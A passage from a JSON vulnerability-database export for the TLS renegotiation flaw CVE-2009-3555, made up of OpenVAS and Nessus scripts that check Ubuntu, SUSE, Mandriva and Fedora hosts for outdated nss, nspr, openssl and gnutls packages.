\"Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds support for the new\n new renegotiation extension and will use it when the server supports it.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-927-1\";\ntag_affected = \"nss vulnerability on Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-927-1/\");\n script_id(840416);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 17:02:11 +0200 (Fri, 16 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"927-1\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Ubuntu Update for nss vulnerability USN-927-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d-dbg\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-dev\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-0d\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-tools\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5062661 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-11-23T00:00:00", "id": "OPENVAS:136141256231066310", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066310", "type": "openvas", "title": "SLES9: Security update for OpenSSL", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5062661.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5062661 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66310\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES9: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.7d~15.41\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-18T10:57:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of mandriva-release", "modified": "2017-12-18T00:00:00", "published": "2010-02-19T00:00:00", "id": "OPENVAS:830893", "href": "http://plugins.openvas.org/nasl.php?oid=830893", "type": "openvas", "title": "Mandriva Update for mandriva-release MDVA-2010:069 (mandriva-release)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mandriva-release MDVA-2010:069 (mandriva-release)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The new mandriva-release packages adds extended maintenance access\n support.\n\n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"mandriva-release on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-02/msg00030.php\");\n script_id(830893);\n script_version(\"$Revision: 8153 $\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-18 07:30:39 +0100 (Mon, 18 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"MDVA\", value: \"2010:069\");\n script_name(\"Mandriva Update for mandriva-release MDVA-2010:069 (mandriva-release)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mandriva-release\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-common\", rpm:\"mandriva-release-common~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-Flash\", rpm:\"mandriva-release-Flash~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-Free\", rpm:\"mandriva-release-Free~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-One\", rpm:\"mandriva-release-One~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-Powerpack\", rpm:\"mandriva-release-Powerpack~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release\", rpm:\"mandriva-release~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-11-17T00:00:00", "id": "OPENVAS:66279", "href": "http://plugins.openvas.org/nasl.php?oid=66279", "type": "openvas", "title": "SLES10: Security update for OpenSSL", "sourceData": "#\n#VID slesp2-openssl-6654\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(66279);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES10: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8a~18.39.1\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8a~18.39.1\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8a~18.39.1\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-927-5", "modified": "2017-12-22T00:00:00", "published": "2010-07-02T00:00:00", "id": "OPENVAS:1361412562310840453", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840453", "type": "openvas", "title": "Ubuntu Update for nspr update USN-927-5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_927_5.nasl 8228 2017-12-22 07:29:52Z teissa $\n#\n# Ubuntu Update for nspr update USN-927-5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-927-4 fixed vulnerabilities in NSS. This update provides the NSPR\n needed to use the new NSS.\n\n Original advisory details:\n \n Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds support for the new\n new renegotiation extension and will use it when the server supports it.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-927-5\";\ntag_affected = \"nspr update on Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-927-5/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840453\");\n script_cve_id(\"CVE-2009-3555\");\n script_version(\"$Revision: 8228 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 08:29:52 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-02 14:26:21 +0200 (Fri, 02 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"927-5\");\n script_name(\"Ubuntu Update for nspr update USN-927-5\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"4.8-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"4.8-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"4.8-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-19T15:05:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nss", "modified": "2018-01-18T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:1361412562310861798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861798", "type": "openvas", "title": "Fedora Update for nss FEDORA-2010-3905", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss FEDORA-2010-3905\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss on Fedora 11\";\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to\n support cross-platform development of security-enabled client and\n server applications. Applications built with NSS can support SSL v2\n and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509\n v3 certificates, and other security standards.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037711.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861798\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-3905\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Fedora Update for nss FEDORA-2010-3905\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.2.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "[0.9.7a-9.2]\n- CVE-2009-3555 - support the secure renegotiation RFC (#533125) ", "edition": 4, "modified": "2010-03-25T00:00:00", "published": "2010-03-25T00:00:00", "id": "ELSA-2010-0164", "href": "http://linux.oracle.com/errata/ELSA-2010-0164.html", "title": "openssl097a security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T14:04:21", "description": "This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.", "edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2011-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgnutls-extra26", "p-cpe:/a:novell:opensuse:libgnutls26", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:libgnutls26-32bit", "p-cpe:/a:novell:opensuse:gnutls", "p-cpe:/a:novell:opensuse:libgnutls-devel", "p-cpe:/a:novell:opensuse:libgnutls-extra-devel"], "id": "SUSE_11_1_GNUTLS-101206.NASL", "href": "https://www.tenable.com/plugins/nessus/53661", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3647.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53661);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)\");\n script_summary(english:\"Check for the gnutls-3647 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00051.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"gnutls-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-devel-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra-devel-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra26-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls26-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-24.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:02:31", "description": "IBM Java 1.4.2 was updated to Version U13 FP 4 iFixes, to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, and also SAP installer\nrelated bugs.", "edition": 23, "published": "2010-06-11T00:00:00", "title": "SuSE9 Security Update : IBM Java 1.4.2 (YOU Patch Number 12621)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-06-11T00:00:00", "cpe": 